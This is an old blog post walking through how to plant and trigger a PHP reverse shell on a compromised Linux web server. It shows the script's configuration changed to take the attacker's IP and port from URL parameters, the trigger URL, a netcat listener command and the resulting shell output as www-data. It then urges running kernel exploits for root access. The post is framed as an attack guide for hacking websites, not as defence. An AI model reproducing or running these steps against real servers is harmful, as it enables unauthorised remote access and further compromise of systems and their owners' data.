Selasa, 06 Desember 2011

PHP Reverse Shell On Linux Server

If you are attacking a website and successfully compromised, you have to connect back from the web server machine to your local machine for future Attack. I have one simple php script to do that, only enter your ip address and your port on the URL to connect back. for example :

http://192.168.56.101/rs.php?ip=192.168.56.1&port=1234

At the ip 192.168.56.101 is the target ip, the script called rs.php and then variables ip and port are from your local machine. 


the script is  below :

At the original script ask you to change the variables ip and port  

Script before change
$VERSION = "1.0";
$ip = '127.0.0.1';  // CHANGE THIS
$port = '1234';       // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;


the script after changed :
$VERSION = "1.0";
$ip = $_GET['ip'];  // CHANGED
$port = $_GET['port'];       // CHANGED
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;


you can download the full script Here >>

next..
after changed, open your terminal on your local machine and use net cat to listening. example :

root@bt:~# nc -l -n -v -p 1234
listening on [any] 1234 ...
This will be open listening on port 1234.

go to your browser run the script on the target web server with enter your ip address and port destination
if connected you will be have an message like "connection successfully".
look to your terminal an then you will meet like this :

root@bt:~# nc -l -n -v -p 1234
listening on [any] 1234 ...
connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 37140
Linux bt 2.6.39.4 #1 SMP Thu Aug 18 13:38:02 NZST 2011 i686 GNU/Linux
 20:47:47 up  2:12,  6 users,  load average: 0.09, 0.07, 0.06
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
root     tty1     -                18:36    2:11m  0.11s  0.00s /bin/bash /usr/
root     pts/0    :0               18:36    2:11m  0.00s  1.64s kdeinit4: kded4
root     pts/2    :0.0             18:37    2:10m  4.28s  4.23s wvdial smart
root     pts/3    :0.0             18:38    1:10m  1.03s  1.02s elinks
root     pts/1    :0.0             20:32   15:13   0.01s  0.01s /bin/bash
root     pts/6    :0.0             20:41   13.00s  0.03s  0.00s nc -l -n -v -p
uid=33(www-data) gid=33(www-data) groups=33(www-data)
sh: no job control in this shell
sh-4.1$ 

run your exploit to get root access.. 
for more information about kernel exploit read my older post get-root-access-on-server
visit Exploit-db for more exploit..
thanks for reader... :D 

Tidak ada komentar:

Posting Komentar